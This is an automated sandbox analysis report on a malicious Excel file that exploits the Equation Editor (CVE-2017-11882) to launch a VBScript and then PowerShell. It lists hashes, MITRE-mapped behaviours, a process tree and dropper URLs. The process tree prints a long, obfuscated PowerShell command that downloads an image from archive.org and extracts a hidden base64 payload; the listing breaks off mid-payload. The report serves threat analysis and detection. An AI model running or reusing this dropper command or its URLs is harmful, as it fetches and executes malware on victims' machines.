8d63eba4ef2da4efb846b76e1165589c6454d62be2cacdb33a25fc2b86da3840

Analysis

max time kernel
144s
max time network
119s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
23/08/2024, 02:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8d63eba4ef2da4efb846b76e1165589c6454d62be2cacdb33a25fc2b86da3840.xls
Size

600KB
MD5

b3a4dad414b683e71cc5a43103cb4f6c
SHA1

2632340f6e7396d35fdb6cca25b17c38d3144076
SHA256

8d63eba4ef2da4efb846b76e1165589c6454d62be2cacdb33a25fc2b86da3840
SHA512

83c538d6c575b1e7e7950986580836a97e783e9cf7e7e50095d85e9d580d201892c73c64a939e3df9301f1e0648f78b6f84f3b11d9ebaf589d4c24a4eaef7401
SSDEEP

12288:YxgMvj3Qtb78ziZCc25R/7A188T2y4eMAOJDNbOmONi2AZOk5Zz7:u8h78zoCc25R/U188T2yU65NAd5

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
26	2564	EQNEDT32.EXE
28	892	powershell.exe
29	892	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2392	powershell.exe
892	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Office\Common\Offline\Files\https://kutt.uk/X4esZc	WINWORD.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2564	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2848	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2392	powershell.exe
892	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	892	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2848	EXCEL.EXE
2848	EXCEL.EXE
2848	EXCEL.EXE
2676	WINWORD.EXE
2676	WINWORD.EXE
2848	EXCEL.EXE
2848	EXCEL.EXE
2848	EXCEL.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2676 wrote to memory of 1636	2676	WINWORD.EXE	33
PID 2676 wrote to memory of 1636	2676	WINWORD.EXE	33
PID 2676 wrote to memory of 1636	2676	WINWORD.EXE	33
PID 2676 wrote to memory of 1636	2676	WINWORD.EXE	33
PID 2564 wrote to memory of 3044	2564	EQNEDT32.EXE	35
PID 2564 wrote to memory of 3044	2564	EQNEDT32.EXE	35
PID 2564 wrote to memory of 3044	2564	EQNEDT32.EXE	35
PID 2564 wrote to memory of 3044	2564	EQNEDT32.EXE	35
PID 3044 wrote to memory of 2392	3044	WScript.exe	36
PID 3044 wrote to memory of 2392	3044	WScript.exe	36
PID 3044 wrote to memory of 2392	3044	WScript.exe	36
PID 3044 wrote to memory of 2392	3044	WScript.exe	36
PID 2392 wrote to memory of 892	2392	powershell.exe	38
PID 2392 wrote to memory of 892	2392	powershell.exe	38
PID 2392 wrote to memory of 892	2392	powershell.exe	38
PID 2392 wrote to memory of 892	2392	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\8d63eba4ef2da4efb846b76e1165589c6454d62be2cacdb33a25fc2b86da3840.xls
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2848

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1636

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\veryniceprocessforbutterchoco.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⊔ ➙ ꜌ ⡭ ⛗Bp⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗YQBn⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗VQBy⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗9⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗JwBo⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bw⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗Og⊔ ➙ ꜌ ⡭ ⛗v⊔ ➙ ꜌ ⡭ ⛗C8⊔ ➙ ꜌ ⡭ ⛗aQBh⊔ ➙ ꜌ ⡭ ⛗Dg⊔ ➙ ꜌ ⡭ ⛗M⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗z⊔ ➙ ꜌ ⡭ ⛗DE⊔ ➙ ꜌ ⡭ ⛗M⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗0⊔ ➙ ꜌ ⡭ ⛗C4⊔ ➙ ꜌ ⡭ ⛗dQBz⊔ ➙ ꜌ ⡭ ⛗C4⊔ ➙ ꜌ ⡭ ⛗YQBy⊔ ➙ ꜌ ⡭ ⛗GM⊔ ➙ ꜌ ⡭ ⛗a⊔ ➙ ꜌ ⡭ ⛗Bp⊔ ➙ ꜌ ⡭ ⛗HY⊔ ➙ ꜌ ⡭ ⛗ZQ⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗G8⊔ ➙ ꜌ ⡭ ⛗cgBn⊔ ➙ ꜌ ⡭ ⛗C8⊔ ➙ ꜌ ⡭ ⛗Mg⊔ ➙ ꜌ ⡭ ⛗3⊔ ➙ ꜌ ⡭ ⛗C8⊔ ➙ ꜌ ⡭ ⛗aQB0⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗bQBz⊔ ➙ ꜌ ⡭ ⛗C8⊔ ➙ ꜌ ⡭ ⛗dgBi⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗Xw⊔ ➙ ꜌ ⡭ ⛗y⊔ ➙ ꜌ ⡭ ⛗D⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗Mg⊔ ➙ ꜌ ⡭ ⛗0⊔ ➙ ꜌ ⡭ ⛗D⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗Nw⊔ ➙ ꜌ ⡭ ⛗y⊔ ➙ ꜌ ⡭ ⛗DY⊔ ➙ ꜌ ⡭ ⛗Xw⊔ ➙ ꜌ ⡭ ⛗y⊔ ➙ ꜌ ⡭ ⛗D⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗Mg⊔ ➙ ꜌ ⡭ ⛗0⊔ ➙ ꜌ ⡭ ⛗D⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗Nw⊔ ➙ ꜌ ⡭ ⛗y⊔ ➙ ꜌ ⡭ ⛗DY⊔ ➙ ꜌ ⡭ ⛗LwB2⊔ ➙ ꜌ ⡭ ⛗GI⊔ ➙ ꜌ ⡭ ⛗cw⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗Go⊔ ➙ ꜌ ⡭ ⛗c⊔ ➙ ꜌ ⡭ ⛗Bn⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗Ow⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗Hc⊔ ➙ ꜌ ⡭ ⛗ZQBi⊔ ➙ ꜌ ⡭ ⛗EM⊔ ➙ ꜌ ⡭ ⛗b⊔ ➙ ꜌ ⡭ ⛗Bp⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗bgB0⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗PQ⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗E4⊔ ➙ ꜌ ⡭ ⛗ZQB3⊔ ➙ ꜌ ⡭ ⛗C0⊔ ➙ ꜌ ⡭ ⛗TwBi⊔ ➙ ꜌ ⡭ ⛗Go⊔ ➙ ꜌ ⡭ ⛗ZQBj⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗BT⊔ ➙ ꜌ ⡭ ⛗Hk⊔ ➙ ꜌ ⡭ ⛗cwB0⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗bQ⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗E4⊔ ➙ ꜌ ⡭ ⛗ZQB0⊔ ➙ ꜌ ⡭ ⛗C4⊔ ➙ ꜌ ⡭ ⛗VwBl⊔ ➙ ꜌ ⡭ ⛗GI⊔ ➙ ꜌ ⡭ ⛗QwBs⊔ ➙ ꜌ ⡭ ⛗Gk⊔ ➙ ꜌ ⡭ ⛗ZQBu⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗Ow⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗Gk⊔ ➙ ꜌ ⡭ ⛗bQBh⊔ ➙ ꜌ ⡭ ⛗Gc⊔ ➙ ꜌ ⡭ ⛗ZQBC⊔ ➙ ꜌ ⡭ ⛗Hk⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗9⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗J⊔ ➙ ꜌ ⡭ ⛗B3⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗YgBD⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗aQBl⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗EQ⊔ ➙ ꜌ ⡭ ⛗bwB3⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗b⊔ ➙ ꜌ ⡭ ⛗Bv⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗BE⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bh⊔ ➙ ꜌ ⡭ ⛗Cg⊔ ➙ ꜌ ⡭ ⛗J⊔ ➙ ꜌ ⡭ ⛗Bp⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗YQBn⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗VQBy⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗KQ⊔ ➙ ꜌ ⡭ ⛗7⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗aQBt⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗ZwBl⊔ ➙ ꜌ ⡭ ⛗FQ⊔ ➙ ꜌ ⡭ ⛗ZQB4⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗9⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗WwBT⊔ ➙ ꜌ ⡭ ⛗Hk⊔ ➙ ꜌ ⡭ ⛗cwB0⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗bQ⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗FQ⊔ ➙ ꜌ ⡭ ⛗ZQB4⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗LgBF⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗YwBv⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗aQBu⊔ ➙ ꜌ ⡭ ⛗Gc⊔ ➙ ꜌ ⡭ ⛗XQ⊔ ➙ ꜌ ⡭ ⛗6⊔ ➙ ꜌ ⡭ ⛗Do⊔ ➙ ꜌ ⡭ ⛗VQBU⊔ ➙ ꜌ ⡭ ⛗EY⊔ ➙ ꜌ ⡭ ⛗O⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗Ec⊔ ➙ ꜌ ⡭ ⛗ZQB0⊔ ➙ ꜌ ⡭ ⛗FM⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗By⊔ ➙ ꜌ ⡭ ⛗Gk⊔ ➙ ꜌ ⡭ ⛗bgBn⊔ ➙ ꜌ ⡭ ⛗Cg⊔ ➙ ꜌ ⡭ ⛗J⊔ ➙ ꜌ ⡭ ⛗Bp⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗YQBn⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗QgB5⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗ZQBz⊔ ➙ ꜌ ⡭ ⛗Ck⊔ ➙ ꜌ ⡭ ⛗Ow⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bh⊔ ➙ ꜌ ⡭ ⛗HI⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗BG⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗YQBn⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗PQ⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗P⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗8⊔ ➙ ꜌ ⡭ ⛗EI⊔ ➙ ꜌ ⡭ ⛗QQBT⊔ ➙ ꜌ ⡭ ⛗EU⊔ ➙ ꜌ ⡭ ⛗Ng⊔ ➙ ꜌ ⡭ ⛗0⊔ ➙ ꜌ ⡭ ⛗F8⊔ ➙ ꜌ ⡭ ⛗UwBU⊔ ➙ ꜌ ⡭ ⛗EE⊔ ➙ ꜌ ⡭ ⛗UgBU⊔ ➙ ꜌ ⡭ ⛗D4⊔ ➙ ꜌ ⡭ ⛗Pg⊔ ➙ ꜌ ⡭ ⛗n⊔ ➙ ꜌ ⡭ ⛗Ds⊔ ➙ ꜌ ⡭ ⛗J⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗BG⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗YQBn⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗PQ⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗P⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗8⊔ ➙ ꜌ ⡭ ⛗EI⊔ ➙ ꜌ ⡭ ⛗QQBT⊔ ➙ ꜌ ⡭ ⛗EU⊔ ➙ ꜌ ⡭ ⛗Ng⊔ ➙ ꜌ ⡭ ⛗0⊔ ➙ ꜌ ⡭ ⛗F8⊔ ➙ ꜌ ⡭ ⛗RQBO⊔ ➙ ꜌ ⡭ ⛗EQ⊔ ➙ ꜌ ⡭ ⛗Pg⊔ ➙ ꜌ ⡭ ⛗+⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗Ow⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bh⊔ ➙ ꜌ ⡭ ⛗HI⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗BJ⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗Hg⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗9⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗J⊔ ➙ ꜌ ⡭ ⛗Bp⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗YQBn⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗V⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗Hg⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗Ek⊔ ➙ ꜌ ⡭ ⛗bgBk⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗e⊔ ➙ ꜌ ⡭ ⛗BP⊔ ➙ ꜌ ⡭ ⛗GY⊔ ➙ ꜌ ⡭ ⛗K⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bh⊔ ➙ ꜌ ⡭ ⛗HI⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗BG⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗YQBn⊔ ➙ ꜌ ⡭ ⛗Ck⊔ ➙ ꜌ ⡭ ⛗Ow⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗bgBk⊔ ➙ ꜌ ⡭ ⛗Ek⊔ ➙ ꜌ ⡭ ⛗bgBk⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗e⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗D0⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗Gk⊔ ➙ ꜌ ⡭ ⛗bQBh⊔ ➙ ꜌ ⡭ ⛗Gc⊔ ➙ ꜌ ⡭ ⛗ZQBU⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗e⊔ ➙ ꜌ ⡭ ⛗B0⊔ ➙ ꜌ ⡭ ⛗C4⊔ ➙ ꜌ ⡭ ⛗SQBu⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗ZQB4⊔ ➙ ꜌ ⡭ ⛗E8⊔ ➙ ꜌ ⡭ ⛗Zg⊔ ➙ ꜌ ⡭ ⛗o⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗ZQBu⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗RgBs⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗Zw⊔ ➙ ꜌ ⡭ ⛗p⊔ ➙ ꜌ ⡭ ⛗Ds⊔ ➙ ꜌ ⡭ ⛗J⊔ ➙ ꜌ ⡭ ⛗Bz⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗YQBy⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗SQBu⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗ZQB4⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗LQBn⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗w⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗LQBh⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗ZQBu⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗SQBu⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗ZQB4⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗LQBn⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bh⊔ ➙ ꜌ ⡭ ⛗HI⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗BJ⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗Hg⊔ ➙ ꜌ ⡭ ⛗Ow⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bh⊔ ➙ ꜌ ⡭ ⛗HI⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗BJ⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗Hg⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗r⊔ ➙ ꜌ ⡭ ⛗D0⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bh⊔ ➙ ꜌ ⡭ ⛗HI⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗BG⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗YQBn⊔ ➙ ꜌ ⡭ ⛗C4⊔ ➙ ꜌ ⡭ ⛗T⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗ZwB0⊔ ➙ ꜌ ⡭ ⛗Gg⊔ ➙ ꜌ ⡭ ⛗Ow⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗GI⊔ ➙ ꜌ ⡭ ⛗YQBz⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗Ng⊔ ➙ ꜌ ⡭ ⛗0⊔ ➙ ꜌ ⡭ ⛗Ew⊔ ➙ ꜌ ⡭ ⛗ZQBu⊔ ➙ ꜌ ⡭ ⛗Gc⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bo⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗PQ⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗ZQBu⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗SQBu⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗ZQB4⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗LQ⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗cwB0⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗cgB0⊔ ➙ ꜌ ⡭ ⛗Ek⊔ ➙ ꜌ ⡭ ⛗bgBk⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗e⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗7⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗YgBh⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗ZQ⊔ ➙ ꜌ ⡭ ⛗2⊔ ➙ ꜌ ⡭ ⛗DQ⊔ ➙ ꜌ 